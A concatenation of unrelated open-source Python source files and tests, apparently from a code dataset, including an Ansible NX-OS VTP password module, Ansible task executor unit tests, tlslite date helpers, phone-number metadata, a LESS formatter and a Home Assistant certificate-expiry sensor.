def test_message_attrs(self):
self.client.login(username='super', password='secret')
response = self.client.get('/auth_processor_messages/')
self.assertContains(response, "Message 1")
def test_user_attrs(self):
"""
Test that the lazy objects returned behave just like the wrapped objects.
"""
# These are 'functional' level tests for common use cases. Direct
# testing of the implementation (SimpleLazyObject) is in the 'utils'
# tests.
self.client.login(username='super', password='secret')
user = authenticate(username='super', password='secret')
response = self.client.get('/auth_processor_user/')
self.assertContains(response, "unicode: super")
self.assertContains(response, "id: 100")
self.assertContains(response, "username: super")
# bug #12037 is tested by the {% url %} in the template:
self.assertContains(response, "url: /userpage/super/")
# See if this object can be used for queries where a Q() comparing
# a user can be used with another Q() (in an AND or OR fashion).
# This simulates what a template tag might do with the user from the
# context. Note that we don't need to execute a query, just build it.
#
# The failure case (bug #12049) on Python 2.4 with a LazyObject-wrapped
# User is a fatal TypeError: "function() takes at least 2 arguments
# (0 given)" deep inside deepcopy().
#
# Python 2.5 and 2.6 succeeded, but logged internally caught exception
# spew:
#
# Exception RuntimeError: 'maximum recursion depth exceeded while
# calling a Python object' in <type 'exceptions.AttributeError'>
# ignored"
query = Q(user=response.context['user']) & Q(someflag=True)
# Tests for user equality. This is hard because User defines
# equality in a non-duck-typing way
# See bug #12060
self.assertEqual(response.context['user'], user)
self.assertEqual(user, response.context['user'])
| bsd-3-clause |
willthames/ansible | lib/ansible/modules/network/nxos/nxos_vtp_password.py | 7 | 7866 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: nxos_vtp_password
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages VTP password configuration.
description:
- Manages VTP password configuration.
author:
- Gabriele Gerbino (@GGabriele)
notes:
- VTP feature must be active on the device to use this module.
- This module is used to manage only VTP passwords.
- Use this in combination with M(nxos_vtp_domain) and M(nxos_vtp_version)
to fully manage VTP operations.
- You can set/remove password only if a VTP domain already exist.
- If C(state=absent) and no C(vtp_password) is provided, it remove the current
VTP password.
- If C(state=absent) and C(vtp_password) is provided, the proposed C(vtp_password)
has to match the existing one in order to remove it.
options:
vtp_password:
description:
- VTP password
required: false
default: null
state:
description:
- Manage the state of the resource
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# ENSURE VTP PASSWORD IS SET
- nxos_vtp_password:
password: ntc
state: present
host: "{{ inventory_hostname }}"
username: "{{ un }}"
password: "{{ pwd }}"
# ENSURE VTP PASSWORD IS REMOVED
- nxos_vtp_password:
password: ntc
state: absent
host: "{{ inventory_hostname }}"
username: "{{ un }}"
password: "{{ pwd }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"vtp_password": "new_ntc"}
existing:
description:
- k/v pairs of existing vtp
returned: always
type: dict
sample: {"domain": "ntc", "version": "1", "vtp_password": "ntc"}
end_state:
description: k/v pairs of vtp after module execution
returned: always
type: dict
sample: {"domain": "ntc", "version": "1", "vtp_password": "new_ntc"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["vtp password new_ntc"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
from ansible.module_utils.nxos import load_config, run_commands
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
import re
def execute_show_command(command, module, command_type='cli_show'):
if 'status' not in command:
output = 'json'
else:
output = 'text'
cmds = [{
'command': command,
'output': output,
}]
body = run_commands(module, cmds)
return body
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
value = table.get(key)
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
def get_vtp_config(module):
command = 'show vtp status'
body = execute_show_command(
command, module)[0]
vtp_parsed = {}
if body:
version_regex = '.*VTP version running\s+:\s+(?P<version>\d).*'
domain_regex = '.*VTP Domain Name\s+:\s+(?P<domain>\S+).*'
try:
match_version = re.match(version_regex, body, re.DOTALL)
version = match_version.groupdict()['version']
except AttributeError:
version = ''
try:
match_domain = re.match(domain_regex, body, re.DOTALL)
domain = match_domain.groupdict()['domain']
except AttributeError:
domain = ''
if domain and version:
vtp_parsed['domain'] = domain
vtp_parsed['version'] = version
vtp_parsed['vtp_password'] = get_vtp_password(module)
return vtp_parsed
def get_vtp_password(module):
command = 'show vtp password'
body = execute_show_command(command, module)[0]
password = body['passwd']
if password:
return str(password)
else:
return ""
def main():
argument_spec = dict(
vtp_password=dict(type='str', no_log=True),
state=dict(choices=['absent', 'present'],
default='present'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
vtp_password = module.params['vtp_password'] or None
state = module.params['state']
existing = get_vtp_config(module)
end_state = existing
args = dict(vtp_password=vtp_password)
changed = False
proposed = dict((k, v) for k, v in args.items() if v is not None)
delta = dict(set(proposed.items()).difference(existing.items()))
commands = []
if state == 'absent':
if vtp_password is not None:
if existing['vtp_password'] == proposed['vtp_password']:
commands.append(['no vtp password'])
else:
module.fail_json(msg="Proposed vtp password doesn't match "
"current vtp password. It cannot be "
"removed when state=absent. If you are "
"trying to change the vtp password, use "
"state=present.")
else:
if not existing.get('domain'):
module.fail_json(msg='Cannot remove a vtp password '
'before vtp domain is set.')
elif existing['vtp_password'] != ('\\'):
commands.append(['no vtp password'])
elif state == 'present':
if delta:
if not existing.get('domain'):
module.fail_json(msg='Cannot set vtp password '
'before vtp domain is set.')
else:
commands.append(['vtp password {0}'.format(vtp_password)])
cmds = flatten_list(commands)
if cmds:
if module.check_mode:
module.exit_json(changed=True, commands=cmds)
else:
changed = True
load_config(module, cmds)
end_state = get_vtp_config(module)
if 'configure' in cmds:
cmds.pop(0)
results = {}
results['proposed'] = proposed
results['existing'] = existing
results['end_state'] = end_state
results['updates'] = cmds
results['changed'] = changed
results['warnings'] = warnings
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
slohse/ansible | test/units/executor/test_task_executor.py | 11 | 18682 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch, MagicMock
from ansible.errors import AnsibleError, AnsibleParserError
from ansible.executor.task_executor import TaskExecutor, remove_omit
from ansible.playbook.play_context import PlayContext
from ansible.plugins.loader import action_loader, lookup_loader
from ansible.parsing.yaml.objects import AnsibleUnicode
from units.mock.loader import DictDataLoader
class TestTaskExecutor(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_task_executor_init(self):
fake_loader = DictDataLoader({})
mock_host = MagicMock()
mock_task = MagicMock()
mock_play_context = MagicMock()
mock_shared_loader = MagicMock()
new_stdin = None
job_vars = dict()
mock_queue = MagicMock()
te = TaskExecutor(
host=mock_host,
task=mock_task,
job_vars=job_vars,
play_context=mock_play_context,
new_stdin=new_stdin,
loader=fake_loader,
shared_loader_obj=mock_shared_loader,
final_q=mock_queue,
)
def test_task_executor_run(self):
fake_loader = DictDataLoader({})
mock_host = MagicMock()
mock_task = MagicMock()
mock_task._role._role_path = '/path/to/role/foo'
mock_play_context = MagicMock()
mock_shared_loader = MagicMock()
mock_queue = MagicMock()
new_stdin = None
job_vars = dict()
te = TaskExecutor(
host=mock_host,
task=mock_task,
job_vars=job_vars,
play_context=mock_play_context,
new_stdin=new_stdin,
loader=fake_loader,
shared_loader_obj=mock_shared_loader,
final_q=mock_queue,
)
te._get_loop_items = MagicMock(return_value=None)
te._execute = MagicMock(return_value=dict())
res = te.run()
te._get_loop_items = MagicMock(return_value=[])
res = te.run()
te._get_loop_items = MagicMock(return_value=['a', 'b', 'c'])
te._run_loop = MagicMock(return_value=[dict(item='a', changed=True), dict(item='b', failed=True), dict(item='c')])
res = te.run()
te._get_loop_items = MagicMock(side_effect=AnsibleError(""))
res = te.run()
self.assertIn("failed", res)
def test_task_executor_get_loop_items(self):
fake_loader = DictDataLoader({})
mock_host = MagicMock()
mock_task = MagicMock()
mock_task.loop_with = 'items'
mock_task.loop = ['a', 'b', 'c']
mock_play_context = MagicMock()
mock_shared_loader = MagicMock()
mock_shared_loader.lookup_loader = lookup_loader
new_stdin = None
job_vars = dict()
mock_queue = MagicMock()
te = TaskExecutor(
host=mock_host,
task=mock_task,
job_vars=job_vars,
play_context=mock_play_context,
new_stdin=new_stdin,
loader=fake_loader,
shared_loader_obj=mock_shared_loader,
final_q=mock_queue,
)
items = te._get_loop_items()
self.assertEqual(items, ['a', 'b', 'c'])
def test_task_executor_run_loop(self):
items = ['a', 'b', 'c']
fake_loader = DictDataLoader({})
mock_host = MagicMock()
def _copy(exclude_parent=False, exclude_tasks=False):
new_item = MagicMock()
return new_item
mock_task = MagicMock()
mock_task.copy.side_effect = _copy
mock_play_context = MagicMock()
mock_shared_loader = MagicMock()
mock_queue = MagicMock()
new_stdin = None
job_vars = dict()
te = TaskExecutor(
host=mock_host,
task=mock_task,
job_vars=job_vars,
play_context=mock_play_context,
new_stdin=new_stdin,
loader=fake_loader,
shared_loader_obj=mock_shared_loader,
final_q=mock_queue,
)
def _execute(variables):
return dict(item=variables.get('item'))
te._squash_items = MagicMock(return_value=items)
te._execute = MagicMock(side_effect=_execute)
res = te._run_loop(items)
self.assertEqual(len(res), 3)
def test_task_executor_squash_items(self):
items = ['a', 'b', 'c']
fake_loader = DictDataLoader({})
mock_host = MagicMock()
loop_var = 'item'
def _evaluate_conditional(templar, variables):
item = variables.get(loop_var)
if item == 'b':
return False
return True
mock_task = MagicMock()
mock_task.evaluate_conditional.side_effect = _evaluate_conditional
mock_play_context = MagicMock()
mock_shared_loader = None
mock_queue = MagicMock()
new_stdin = None
job_vars = dict(pkg_mgr='yum')
te = TaskExecutor(
host=mock_host,
task=mock_task,
job_vars=job_vars,
play_context=mock_play_context,
new_stdin=new_stdin,
loader=fake_loader,
shared_loader_obj=mock_shared_loader,
final_q=mock_queue,
)
# No replacement
mock_task.action = 'yum'
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
self.assertEqual(new_items, ['a', 'b', 'c'])
self.assertIsInstance(mock_task.args, MagicMock)
mock_task.action = 'foo'
mock_task.args = {'name': '{{item}}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
self.assertEqual(new_items, ['a', 'b', 'c'])
self.assertEqual(mock_task.args, {'name': '{{item}}'})
mock_task.action = 'yum'
mock_task.args = {'name': 'static'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
self.assertEqual(new_items, ['a', 'b', 'c'])
self.assertEqual(mock_task.args, {'name': 'static'})
mock_task.action = 'yum'
mock_task.args = {'name': '{{pkg_mgr}}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
self.assertEqual(new_items, ['a', 'b', 'c'])
self.assertEqual(mock_task.args, {'name': '{{pkg_mgr}}'})
mock_task.action = '{{unknown}}'
mock_task.args = {'name': '{{item}}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
self.assertEqual(new_items, ['a', 'b', 'c'])
self.assertEqual(mock_task.args, {'name': '{{item}}'})
# Could do something like this to recover from bad deps in a package
job_vars = dict(pkg_mgr='yum', packages=['a', 'b'])
items = ['absent', 'latest']
mock_task.action = 'yum'
mock_task.args = {'name': '{{ packages }}', 'state': '{{ item }}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
self.assertEqual(new_items, items)
self.assertEqual(mock_task.args, {'name': '{{ packages }}', 'state': '{{ item }}'})
# Maybe should raise an error in this case. The user would have to specify:
# - yum: name="{{ packages[item] }}"
# with_items:
# - ['a', 'b']
# - ['foo', 'bar']
# you can't use a list as a dict key so that would probably throw
# an error later. If so, we can throw it now instead.
# Squashing in this case would not be intuitive as the user is being
# explicit in using each list entry as a key.
job_vars = dict(pkg_mgr='yum', packages={"a": "foo", "b": "bar", "foo": "baz", "bar": "quux"})
items = [['a', 'b'], ['foo', 'bar']]
mock_task.action = 'yum'
mock_task.args = {'name': '{{ packages[item] }}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
self.assertEqual(new_items, items)
self.assertEqual(mock_task.args, {'name': '{{ packages[item] }}'})
# Replaces
items = ['a', 'b', 'c']
mock_task.action = 'yum'
mock_task.args = {'name': '{{item}}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
self.assertEqual(new_items, [['a', 'c']])
self.assertEqual(mock_task.args, {'name': ['a', 'c']})
mock_task.action = '{{pkg_mgr}}'
mock_task.args = {'name': '{{item}}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
self.assertEqual(new_items, [['a', 'c']])
self.assertEqual(mock_task.args, {'name': ['a', 'c']})
# New loop_var
mock_task.action = 'yum'
mock_task.args = {'name': '{{a_loop_var_item}}'}
mock_task.loop_control = {'loop_var': 'a_loop_var_item'}
loop_var = 'a_loop_var_item'
new_items = te._squash_items(items=items, loop_var='a_loop_var_item', variables=job_vars)
self.assertEqual(new_items, [['a', 'c']])
self.assertEqual(mock_task.args, {'name': ['a', 'c']})
loop_var = 'item'
#
# These are presently not optimized but could be in the future.
# Expected output if they were optimized is given as a comment
# Please move these to a different section if they are optimized
#
# Squashing lists
job_vars = dict(pkg_mgr='yum')
items = [['a', 'b'], ['foo', 'bar']]
mock_task.action = 'yum'
mock_task.args = {'name': '{{ item }}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
# self.assertEqual(new_items, [['a', 'b', 'foo', 'bar']])
# self.assertEqual(mock_task.args, {'name': ['a', 'b', 'foo', 'bar']})
self.assertEqual(new_items, items)
self.assertEqual(mock_task.args, {'name': '{{ item }}'})
# Retrieving from a dict
items = ['a', 'b', 'foo']
mock_task.action = 'yum'
mock_task.args = {'name': '{{ packages[item] }}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
# self.assertEqual(new_items, [['foo', 'baz']])
# self.assertEqual(mock_task.args, {'name': ['foo', 'baz']})
self.assertEqual(new_items, items)
self.assertEqual(mock_task.args, {'name': '{{ packages[item] }}'})
# Another way to retrieve from a dict
job_vars = dict(pkg_mgr='yum')
items = [{'package': 'foo'}, {'package': 'bar'}]
mock_task.action = 'yum'
mock_task.args = {'name': '{{ item["package"] }}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
# self.assertEqual(new_items, [['foo', 'bar']])
# self.assertEqual(mock_task.args, {'name': ['foo', 'bar']})
self.assertEqual(new_items, items)
self.assertEqual(mock_task.args, {'name': '{{ item["package"] }}'})
items = [
dict(name='a', state='present'),
dict(name='b', state='present'),
dict(name='c', state='present'),
]
mock_task.action = 'yum'
mock_task.args = {'name': '{{item.name}}', 'state': '{{item.state}}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
# self.assertEqual(new_items, [dict(name=['a', 'b', 'c'], state='present')])
# self.assertEqual(mock_task.args, {'name': ['a', 'b', 'c'], 'state': 'present'})
self.assertEqual(new_items, items)
self.assertEqual(mock_task.args, {'name': '{{item.name}}', 'state': '{{item.state}}'})
items = [
dict(name='a', state='present'),
dict(name='b', state='present'),
dict(name='c', state='absent'),
]
mock_task.action = 'yum'
mock_task.args = {'name': '{{item.name}}', 'state': '{{item.state}}'}
new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
# self.assertEqual(new_items, [dict(name=['a', 'b'], state='present'),
# dict(name='c', state='absent')])
# self.assertEqual(mock_task.args, {'name': '{{item.name}}', 'state': '{{item.state}}'})
self.assertEqual(new_items, items)
self.assertEqual(mock_task.args, {'name': '{{item.name}}', 'state': '{{item.state}}'})
def test_task_executor_execute(self):
fake_loader = DictDataLoader({})
mock_host = MagicMock()
mock_task = MagicMock()
mock_task.args = dict()
mock_task.retries = 0
mock_task.delay = -1
mock_task.register = 'foo'
mock_task.until = None
mock_task.changed_when = None
mock_task.failed_when = None
mock_task.post_validate.return_value = None
# mock_task.async_val cannot be left unset, because on Python 3 MagicMock()
# > 0 raises a TypeError There are two reasons for using the value 1
# here: on Python 2 comparing MagicMock() > 0 returns True, and the
# other reason is that if I specify 0 here, the test fails. ;)
mock_task.async_val = 1
mock_task.poll = 0
mock_play_context = MagicMock()
mock_play_context.post_validate.return_value = None
mock_play_context.update_vars.return_value = None
mock_connection = MagicMock()
mock_connection.set_host_overrides.return_value = None
mock_connection._connect.return_value = None
mock_action = MagicMock()
mock_queue = MagicMock()
shared_loader = None
new_stdin = None
job_vars = dict(omit="XXXXXXXXXXXXXXXXXXX")
te = TaskExecutor(
host=mock_host,
task=mock_task,
job_vars=job_vars,
play_context=mock_play_context,
new_stdin=new_stdin,
loader=fake_loader,
shared_loader_obj=shared_loader,
final_q=mock_queue,
)
te._get_connection = MagicMock(return_value=mock_connection)
te._get_action_handler = MagicMock(return_value=mock_action)
mock_action.run.return_value = dict(ansible_facts=dict())
res = te._execute()
mock_task.changed_when = MagicMock(return_value=AnsibleUnicode("1 == 1"))
res = te._execute()
mock_task.changed_when = None
mock_task.failed_when = MagicMock(return_value=AnsibleUnicode("1 == 1"))
res = te._execute()
mock_task.failed_when = None
mock_task.evaluate_conditional.return_value = False
res = te._execute()
mock_task.evaluate_conditional.return_value = True
mock_task.args = dict(_raw_params='foo.yml', a='foo', b='bar')
mock_task.action = 'include'
res = te._execute()
def test_task_executor_poll_async_result(self):
fake_loader = DictDataLoader({})
mock_host = MagicMock()
mock_task = MagicMock()
mock_task.async_val = 0.1
mock_task.poll = 0.05
mock_play_context = MagicMock()
mock_connection = MagicMock()
mock_action = MagicMock()
mock_queue = MagicMock()
shared_loader = MagicMock()
shared_loader.action_loader = action_loader
new_stdin = None
job_vars = dict(omit="XXXXXXXXXXXXXXXXXXX")
te = TaskExecutor(
host=mock_host,
task=mock_task,
job_vars=job_vars,
play_context=mock_play_context,
new_stdin=new_stdin,
loader=fake_loader,
shared_loader_obj=shared_loader,
final_q=mock_queue,
)
te._connection = MagicMock()
def _get(*args, **kwargs):
mock_action = MagicMock()
mock_action.run.return_value = dict(stdout='')
return mock_action
# testing with some bad values in the result passed to poll async,
# and with a bad value returned from the mock action
with patch.object(action_loader, 'get', _get):
mock_templar = MagicMock()
res = te._poll_async_result(result=dict(), templar=mock_templar)
self.assertIn('failed', res)
res = te._poll_async_result(result=dict(ansible_job_id=1), templar=mock_templar)
self.assertIn('failed', res)
def _get(*args, **kwargs):
mock_action = MagicMock()
mock_action.run.return_value = dict(finished=1)
return mock_action
# now testing with good values
with patch.object(action_loader, 'get', _get):
mock_templar = MagicMock()
res = te._poll_async_result(result=dict(ansible_job_id=1), templar=mock_templar)
self.assertEqual(res, dict(finished=1))
def test_recursive_remove_omit(self):
omit_token = 'POPCORN'
data = {
'foo': 'bar',
'baz': 1,
'qux': ['one', 'two', 'three'],
'subdict': {
'remove': 'POPCORN',
'keep': 'not_popcorn',
'subsubdict': {
'remove': 'POPCORN',
'keep': 'not_popcorn',
},
'a_list': ['POPCORN'],
},
'a_list': ['POPCORN'],
}
expected = {
'foo': 'bar',
'baz': 1,
'qux': ['one', 'two', 'three'],
'subdict': {
'keep': 'not_popcorn',
'subsubdict': {
'keep': 'not_popcorn',
},
'a_list': ['POPCORN'],
},
'a_list': ['POPCORN'],
}
self.assertEqual(remove_omit(data, omit_token), expected)
| gpl-3.0 |
theguardian/JIRA-APPy | lib/tlslite/utils/datefuncs.py | 206 | 2278 | # Author: Trevor Perrin
# See the LICENSE file for legal information regarding use of this file.
import os
#Functions for manipulating datetime objects
#CCYY-MM-DDThh:mm:ssZ
def parseDateClass(s):
year, month, day = s.split("-")
day, tail = day[:2], day[2:]
hour, minute, second = tail[1:].split(":")
second = second[:2]
year, month, day = int(year), int(month), int(day)
hour, minute, second = int(hour), int(minute), int(second)
return createDateClass(year, month, day, hour, minute, second)
if os.name != "java":
from datetime import datetime, timedelta
#Helper functions for working with a date/time class
def createDateClass(year, month, day, hour, minute, second):
return datetime(year, month, day, hour, minute, second)
def printDateClass(d):
#Split off fractional seconds, append 'Z'
return d.isoformat().split(".")[0]+"Z"
def getNow():
return datetime.utcnow()
def getHoursFromNow(hours):
return datetime.utcnow() + timedelta(hours=hours)
def getMinutesFromNow(minutes):
return datetime.utcnow() + timedelta(minutes=minutes)
def isDateClassExpired(d):
return d < datetime.utcnow()
def isDateClassBefore(d1, d2):
return d1 < d2
else:
#Jython 2.1 is missing lots of python 2.3 stuff,
#which we have to emulate here:
import java
import jarray
def createDateClass(year, month, day, hour, minute, second):
c = java.util.Calendar.getInstance()
c.setTimeZone(java.util.TimeZone.getTimeZone("UTC"))
c.set(year, month-1, day, hour, minute, second)
return c
def printDateClass(d):
return "%04d-%02d-%02dT%02d:%02d:%02dZ" % \
(d.get(d.YEAR), d.get(d.MONTH)+1, d.get(d.DATE), \
d.get(d.HOUR_OF_DAY), d.get(d.MINUTE), d.get(d.SECOND))
def getNow():
c = java.util.Calendar.getInstance()
c.setTimeZone(java.util.TimeZone.getTimeZone("UTC"))
c.get(c.HOUR) #force refresh?
return c
def getHoursFromNow(hours):
d = getNow()
d.add(d.HOUR, hours)
return d
def isDateClassExpired(d):
n = getNow()
return d.before(n)
def isDateClassBefore(d1, d2):
return d1.before(d2)
| gpl-2.0 |
cgstudiomap/cgstudiomap | main/eggs/phonenumbers-7.1.1-py2.7.egg/phonenumbers/data/region_TK.py | 10 | 1412 | """Auto-generated file, do not edit by hand. TK metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_TK = PhoneMetadata(id='TK', country_code=690, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='[2-9]\\d{3}', possible_number_pattern='\\d{4}'),
fixed_line=PhoneNumberDesc(national_number_pattern='[2-4]\\d{3}', possible_number_pattern='\\d{4}', example_number='3010'),
mobile=PhoneNumberDesc(national_number_pattern='[5-9]\\d{3}', possible_number_pattern='\\d{4}', example_number='5190'),
toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'))
| agpl-3.0 |
fivethreeo/lesscpy | lesscpy/lessc/formatter.py | 5 | 1090 | # -*- coding: utf8 -*-
"""
.. module:: lesscpy.lessc.formatter
:synopsis: CSS Formatter class.
Copyright (c)
See LICENSE for details.
.. moduleauthor:: Johann T. Mariusson <jtm@robot.is>
"""
class Formatter(object):
def __init__(self, args):
self.args = args
def format(self, parse):
"""
"""
if not parse.result:
return ''
eb = '\n'
if self.args.xminify:
eb = ''
self.args.minify = True
self.items = {}
if self.args.minify:
self.items.update({
'nl': '',
'tab': '',
'ws': '',
'eb': eb
})
else:
tab = '\t' if self.args.tabs else ' ' * int(self.args.spaces)
self.items.update({
'nl': '\n',
'tab': tab,
'ws': ' ',
'eb': eb
})
self.out = [u.fmt(self.items)
for u in parse.result
if u]
return ''.join(self.out).strip()
| mit |
lmprice/ansible | test/sanity/validate-modules/test_validate_modules_regex.py | 162 | 2807 | #!/usr/bin/env python
# This is a standalone test for the regex inside validate-modules
# It is not suitable to add to the make tests target because the
# file under test is outside the test's sys.path AND has a hyphen
# in the name making it unimportable.
#
# To execute this by hand:
# 1) cd <checkoutdir>
# 2) source hacking/env-setup
# 3) PYTHONPATH=./lib nosetests -d -w test -v --nocapture sanity/validate-modules
import re
from ansible.compat.tests import unittest
# TYPE_REGEX = re.compile(r'.*\stype\(.*')
# TYPE_REGEX = re.compile(r'.*(if|or)\stype\(.*')
# TYPE_REGEX = re.compile(r'.*(if|or)(\s+.*|\s+)type\(.*')
# TYPE_REGEX = re.compile(r'.*(if|or)(\s+.*|\s+)type\(.*')
# TYPE_REGEX = re.compile(r'.*(if|\sor)(\s+.*|\s+)type\(.*')
# TYPE_REGEX = re.compile(r'.*(if|\sor)(\s+.*|\s+)(?<!_)type\(.*')
TYPE_REGEX = re.compile(r'.*(if|or)(\s+.*|\s+)(?<!_)(?<!str\()type\(.*')
class TestValidateModulesRegex(unittest.TestCase):
def test_type_regex(self):
# each of these examples needs to be matched or not matched
checks = [
['if type(foo) is Bar', True],
['if Bar is type(foo)', True],
['if type(foo) is not Bar', True],
['if Bar is not type(foo)', True],
['if type(foo) == Bar', True],
['if Bar == type(foo)', True],
['if type(foo)==Bar', True],
['if Bar==type(foo)', True],
['if type(foo) != Bar', True],
['if Bar != type(foo)', True],
['if type(foo)!=Bar', True],
['if Bar!=type(foo)', True],
['if foo or type(bar) != Bar', True],
['x = type(foo)', False],
["error = err.message + ' ' + str(err) + ' - ' + str(type(err))", False],
# cloud/amazon/ec2_group.py
["module.fail_json(msg='Invalid rule parameter type [%s].' % type(rule))", False],
# files/patch.py
["p = type('Params', (), module.params)", False], # files/patch.py
# system/osx_defaults.py
["if self.current_value is not None and not isinstance(self.current_value, type(self.value)):", True],
# system/osx_defaults.py
['raise OSXDefaultsException("Type mismatch. Type in defaults: " + type(self.current_value).__name__)', False],
# network/nxos/nxos_interface.py
["if get_interface_type(interface) == 'svi':", False],
]
for idc, check in enumerate(checks):
cstring = check[0]
cexpected = check[1]
match = TYPE_REGEX.match(cstring)
if cexpected and not match:
assert False, "%s should have matched" % cstring
elif not cexpected and match:
assert False, "%s should not have matched" % cstring
| gpl-3.0 |
MungoRae/home-assistant | homeassistant/components/sensor/cert_expiry.py | 13 | 3516 | """
Counter for the days till a HTTPS (TLS) certificate will expire.
For more details about this sensor please refer to the documentation at
https://home-assistant.io/components/sensor.cert_expiry/
"""
import logging
import socket
import ssl
from datetime import datetime, timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_NAME, CONF_HOST, CONF_PORT,
EVENT_HOMEASSISTANT_START)
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'SSL Certificate Expiry'
DEFAULT_PORT = 443
SCAN_INTERVAL = timedelta(hours=12)
TIMEOUT = 10.0
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up certificate expiry sensor."""
def run_setup(event):
"""Wait until Home Assistant is fully initialized before creating.
Delay the setup until Home Assistant is fully initialized.
"""
server_name = config.get(CONF_HOST)
server_port = config.get(CONF_PORT)
sensor_name = config.get(CONF_NAME)
add_devices([SSLCertificate(sensor_name, server_name, server_port)],
True)
# To allow checking of the HA certificate we must first be running.
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, run_setup)
class SSLCertificate(Entity):
"""Implementation of the certificate expiry sensor."""
def __init__(self, sensor_name, server_name, server_port):
"""Initialize the sensor."""
self.server_name = server_name
self.server_port = server_port
self._name = sensor_name
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unit_of_measurement(self):
"""Return the unit this state is expressed in."""
return 'days'
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return 'mdi:certificate'
def update(self):
"""Fetch the certificate information."""
try:
ctx = ssl.create_default_context()
sock = ctx.wrap_socket(
socket.socket(), server_hostname=self.server_name)
sock.settimeout(TIMEOUT)
sock.connect((self.server_name, self.server_port))
except socket.gaierror:
_LOGGER.error("Cannot resolve hostname: %s", self.server_name)
return
except socket.timeout:
_LOGGER.error(
"Connection timeout with server: %s", self.server_name)
return
except OSError:
_LOGGER.error("Cannot connect to %s", self.server_name)
return
try:
cert = sock.getpeercert()
except OSError:
_LOGGER.error("Cannot fetch certificate from %s", self.server_name)
return
ts_seconds = ssl.cert_time_to_seconds(cert['notAfter'])
timestamp = datetime.fromtimestamp(ts_seconds)
expiry = timestamp - datetime.today()
self._state = expiry.days
| apache-2.0 |
rumirand/GalaxyPlayer5-kernel | scripts/rt-tester/rt-tester.py | 1094 | 5362 | #!/usr/bin/python
#
